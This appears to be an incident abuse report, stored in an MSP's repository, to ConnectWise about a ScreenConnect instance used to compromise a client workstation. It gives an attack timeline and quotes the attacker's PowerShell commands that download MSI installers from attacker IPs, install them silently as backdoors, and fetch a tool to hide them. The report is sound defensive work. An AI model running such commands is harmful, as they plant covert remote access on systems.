azcomputerguru/claudetools
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
2c5f10faaa14799a49ee7be4cb128d757bdf7913
claudetools/clients/dataforth/docs/incident-2026-03-27-abuse-report-connectwise.md
OC-5070 d7d9f72fc6 Session log: Dataforth security incident, MFA rollout, test datasheet investigation 
- DF-JOEL2 compromised via ScreenConnect social engineering (Angel Raya)
- C2 IPs blocked, rogue clients removed, M365 sessions revoked, password reset
- IC3 complaint filed, abuse reports sent to Virtuo and ConnectWise
- Conditional Access policies deployed (MFA, block foreign, block legacy auth)
- 38 stale test station accounts deleted from Entra
- Test datasheet pipeline investigated - data exists in DB, export step broken
- TestDataSheetUploader source code extracted for analysis

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
2026-03-27 20:07:19 -07:00

68 lines
3.6 KiB
Markdown
Raw Blame History

Subject: Abuse Report - ScreenConnect Cloud Instance Used for Unauthorized Access and C2 Deployment
To: abuse@connectwise.com
Dear ConnectWise Security/Abuse Team,
We are reporting a ScreenConnect cloud instance being used to conduct unauthorized access attacks against our client's infrastructure.
## Offending ScreenConnect Instance
- **Relay hostname:** instance-wlb9ga-relay.screenconnect.com
- **Operator alias:** Angel Raya
- **ScreenConnect Client ID:** 0cad93610010625f
- **Session GUID:** 8bb6c85a-6cab-46ab-8cad-26f6d2672a03
- **Client Version:** 26.1.18.9566
## Nature of Abuse
On March 27, 2026, an individual operating under the name "Angel Raya" used the above ScreenConnect cloud instance to gain unauthorized remote access to a victim workstation. Once connected, the operator used the ScreenConnect backstage shell to execute PowerShell commands that:
1. Downloaded and silently installed two additional ScreenConnect clients from self-hosted C2 servers (80.76.49.18:8040 and 45.88.91.99:8040, both on AS399486 / Virtuo hosting)
2. Downloaded a tool to hide the rogue installations from the Windows uninstall list
3. Returned later through the self-hosted C2 backdoor under the session name "Administrator"
## Attack Timeline (March 27, 2026)
- **08:28** - ScreenConnect client (0cad93610010625f) installed from `C:\Users\jlohr\Downloads\ScreenConnect.ClientSetup.msi`
- **08:29** - "Angel Raya" connected via instance-wlb9ga-relay.screenconnect.com
- **08:29** - PowerShell commands executed to install two self-hosted ScreenConnect C2 backdoors
- **08:31** - "Hide From Uninstall List" tool downloaded and extracted
- **08:32** - Tool used to hide rogue ScreenConnect clients from Add/Remove Programs
- **08:32** - "Angel Raya" disconnected
## Commands Executed via Backstage Shell
The following commands were found in the PowerShell terminal history on the victim machine:
```
powershell -Command "Invoke-WebRequest -Uri 'http://80.76.49.18:8040/Bin/ScreenConnect.ClientSetup.msi?e=Access&y=Guest' -OutFile 'ScreenConnect.ClientSetup.msi'; Start-Process msiexec -ArgumentList '/i', 'ScreenConnect.ClientSetup.msi', '/qn', '/norestart' -Wait"
powershell -Command "Invoke-WebRequest -Uri 'http://45.88.91.99:8040/Bin/ScreenConnect.ClientSetup.msi?e=Access&y=Guest' -OutFile 'ScreenConnect.ClientSetup.msi'; Start-Process msiexec -ArgumentList '/i', 'ScreenConnect.ClientSetup.msi', '/qn', '/norestart' -Wait"
Invoke-WebRequest -Uri "https://www.sordum.org/files/downloads.php?hide-from-uninstall-list" -OutFile "C:\Users\Public\Pictures\Backup.zip"
```
## Additional Context
- The victim's Microsoft 365 account also showed successful unauthorized sign-ins from Istanbul, Turkey and Croydon, UK, along with sustained brute-force attempts from Germany and Luxembourg over the preceding week.
- The self-hosted C2 ScreenConnect MSI packages have build dates of April 8, 2025, suggesting this operation has been active for approximately one year.
- The victim was a departing employee (retiring March 31, 2026), which may have been a factor in targeting.
## Requested Action
1. Identify and suspend the ScreenConnect cloud account associated with instance-wlb9ga-relay.screenconnect.com
2. Preserve all session logs, account registration information, and billing details for this instance
3. Share any available information with law enforcement upon request
This incident is being reported to the FBI IC3 and the hosting provider (Virtuo / AS399486).
## Reporting Organization
Arizona Computer Guru, LLC
Managed Service Provider
Phone: 520-304-8300
Email: support@azcomputerguru.com
Thank you for your prompt response.
Reference in New Issue View Git Blame Copy Permalink